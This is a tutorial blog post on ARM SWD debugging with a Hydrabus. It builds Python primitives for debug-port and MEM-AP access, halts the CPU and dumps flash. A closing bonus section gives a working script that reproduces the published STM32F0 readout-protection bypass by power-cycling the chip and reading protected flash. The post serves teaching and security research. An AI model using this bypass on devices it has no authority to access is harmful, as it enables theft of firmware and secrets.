SWD part 2 : the MEM-AP

After part 1, you should now be familiar with the basics of SWD. We finished the article at the gates of an important part of the SWD architecture: the MEM-AP.

The MEM-AP (MEMory Access Port) provides read and write access to the memory space of the CPU. This is the part used to access the SRAM, Flash, and registers of the target device. Again, the MEM-AP is the same on all Cortex- processors and defined in the ARM Debug Interface Architecture Specification.

Preparing the ground

Before going further into details, let’s first rewrite the code provided in the first article to create primitive functions for accessing the bus :

DP access

The DP (Debug Port) is our entry point on the bus. It will handle all requests and forward them to the correct AP when needed. These basic functions will help us communicating directly with the DP :

import pyHydrabus

#Setup the Hydrabus interface for SWD
r = pyHydrabus.RawWire('/dev/ttyACM0')
r._config = 0xa
r._configure_port()

def init():
    """ Init SWD interface
    """
    r.write(b'\xff\xff\xff\xff\xff\xff\x7b\x9e\xff\xff\xff\xff\xff\xff\x0f')
    sync()

def sync():         
    r.write(b'\x00')

def apply_dp_parity(value):
    tmp = value & 0b00011110
    if(bin(tmp).count('1')%2) == 1:
        value = value | 1<<5
    return value

def read_dp(addr, to_ap=0):    
    """ Read a value from DP register <addr>
    <to_ap> defines if the request has to be forwarded to an AP
    Returns bytes()
    """                                     
    CMD = 0x85
    CMD = CMD | to_ap << 1
    CMD = CMD | (addr & 0b1100) << 1
    CMD = apply_dp_parity(CMD)

    r.write(CMD.to_bytes(1, byteorder="little"))
    status = 0
    for i in range(3):
        status += ord(r.read_bit())<<i
    if status == 1:
        retval = int.from_bytes(r.read(4), byteorder="little")
        sync()
        return retval
    else:
        sync()
        raise ValueError(f"Returned status is {hex(status)}")

def write_dp(addr, value, to_ap=0):
    """ Write <value> to DP register <addr>
    """
    CMD = 0x81
    CMD = CMD | to_ap << 1
    CMD = CMD | (addr & 0b1100) << 1
    CMD = apply_dp_parity(CMD)

    r.write(CMD.to_bytes(1, byteorder="little"))
    status = 0
    for i in range(3):
        status += ord(r.read_bit())<<i
    r.clocks(2)
    if status != 1:
        sync()
        raise ValueError(f"Returned status is {hex(status)}")
    r.write(value.to_bytes(4, byteorder="little"))

    #Send the parity but along with the sync clocks
    if(bin(value).count('1')%2) == 1:
        r.write(b'\x01')
    else:
        r.write(b'\x00')

AP access

Now that we have basic DP functions, we can use them to access the APs on the bus. Refer to part 1 if you need a refresh on how to select a specific register on an AP :

def read_ap(address, bank):
    """ Read register <bank> from AP at <address>
    Returns bytes()
    """        
    select_reg = 0

    #Place AP address in DP SELECT register
    select_reg = select_reg | address << 24

    #Place bank in register as well
    select_reg = select_reg | (bank & 0b11110000)

    #Write the SELECT DP register
    write_dp(8, select_reg)
    read_dp( (bank&0b1100),
            to_ap=1)

    #Read RDBUFF
    return read_dp(0xc)

def write_ap(address, bank, value):
    """ Write <value> to  register <bank> of AP at <address>
    """        
    select_reg = 0

    #Place AP address in DP SELECT register
    select_reg = select_reg | address << 24

    #Place bank in register as well
    select_reg = select_reg | (bank & 0b11110000)

    #Write the SELECT DP register
    write_dp(8, select_reg)

    #Send the actual value to the AP
    write_dp( (bank&0b1100),
            value,
            to_ap=1)

Now that we have those primitives, we can recreate the AP scanning code seen in part 1 in a more readable way :

#init SWD bus
init()
print(f"DPIDR: {hex(read_dp(0))}")

#Power up debug domain
write_dp(4, 0x50000000)

#Scan the SWD bus
for i in range(256):
    print(f"AP {i} IDCODE: {hex(read_ap(i, 0xfc))}")

That’s it! Way more readable isn’t it? Now let’s continue and dig into the MEM-AP.

MEM-AP interaction

Registers

The MEM-AP has several registers used to configure and interact with the memory of the target processor. The main ones are described below :

CSW (Address 0x00)

Control and Status Word register. Contains the MEM-AP transfers configuration. The interesting part is the first three bits [0:2] which set the transfer width. By default it is set to 0b010 (32 bits) but it is possible to set it to a higher size (implementaiton-dependant setting).

TAR (Address 0x04)

The Transfer Address Register holds the memory address to be accessed by the MEM-AP.

DRW (Address 0x0c)

The Data Read Write register is used to transfer data to/from the processor memory. Reading this register will trigger a 32-bit (by default) transfer from the processor memory space at address set in the TAR register to this register. The value will then be sent to the external debugger. Writing to this register will store the value sent by the external debugger to the register, then transfer the value to the memory location pointed to by the TAR register.

Using these three registers, it is possible to perform any memory access for data up to 32 bits. We won’t cover additional methods like banked transfer for simplicity reasons, but you can find all the documentation in the architecture specs.

Memory transfer

The following code allows to transfer 4 bytes (32 bits) from a device RAM (address 0x20000000) to the host :

#Assume MEM-AP is at address 0 on the bus

#Set TAR register to 0x20000000
write_ap(0, 0x4, 0x20000000)
#Read DRW register and convert data to bytes
val = read_ap(0, 0xc).to_bytes(4, byteorder="little")

print(val.hex())

Using this, it is possible to read all the target device SRAM by looping on the address. This works quite well, but if we are doing the same with the flash, it will sometimes fail as the DP will respond with a WAIT status.

Turns out, the CPU and the MEM-AP share the AHB bus inside of the microcontroller and they get in conflict accessing the bus while the CPU is running. In that situation, the specs say that the transfer has to be retried. This is far from being optimal, so let’s see how to stop the CPU :

Cortex debug registers

This time, we have to dig into the CPU technical reference manual to find the DHCSR register. This register controls the debugging features of the CPU, including the C_HALT[1] and C_DEBUGEN[0] bits. Changing their value to 1 will cause the CPU to stop its execution, and writing a zero will make the CPU continue its execution. The documentation tells us that this register location is in the CPU memory at address 0xE000EDF0, so we can create more helper functions :

def halt_cpu():
    #Set MEM-AP TAR to 0xE000EDF0
    write_ap(0, 0x4, 0xE000EDF0)
    #Write to MEM-AP DRW, writing the DHCSR bits C_STOP and C_DEBUGEN
    write_ap(0, 0xc, 0xA05F0003)

def run_cpu():
    write_ap(0, 0x4, 0xE000EDF0)
    write_ap(0, 0xc, 0xA05F0000)

And now our script to dump a microcontroller flash becomes :

buff = b''

#SWD init
init()
read_dp(0)
write_dp(4, 0x50000000)

halt_cpu()

for i in range(0,0xc00,4):
    write_ap(0, 0x4, 0x08000000+i)
    val = read_ap(0, 0xc).to_bytes(4, byteorder="little")
    buff = buff+val

run_cpu()

Bonus: reproduce STM32F0 race condition bug

In 2017, researchers from the Fraunhofer institute presented a vulnerability on the STM32F0 family of microcontrollers that allowed to bypass the readout protection. The vulnerability was caused by the fact that the protection was set up during the first AHB transfer done by the MEM-AP, so it was sometimes possible to read the result of an AHB transfer before the readout protection was enforced.

By using the primitives we created in this article, it is possible to reproduce this attack. The only catch is that the target MCU has to be powered off after each transfer to reset the readout protection. In order to do this, we used a simple MOSFET driven by an auxiliary GPIO to power the STM32F0 on or off :

d = b""

# Setup auxiliary pin
r.AUX[0].direction=pyHydrabus.OUTPUT
r.AUX[0].value = 0

x = 0
while(x < 0x4000):
    try:
        r.AUX[0].value = 1
        time.sleep(0.001)
        init()
        read_dp(0)
        write_dp(4, 0x50000000)
        write_ap(0, 0x4, 0x08000000+x)
        val = read_ap(0, 0xc).to_bytes(4, byteorder="little")
        r.AUX[0].value = 0
        d = d+val
        print(f"{hex(x)}:{val.hex()}")
        x = x+4
    except ValueError:
        r.AUX[0].value = 0
        continue

r.close()
hexdump.hexdump(d)                                                 

Running the script, it took around five minutes to retrieve the whole 16KB of the flash. Not so bad!

One comment

Leave a Reply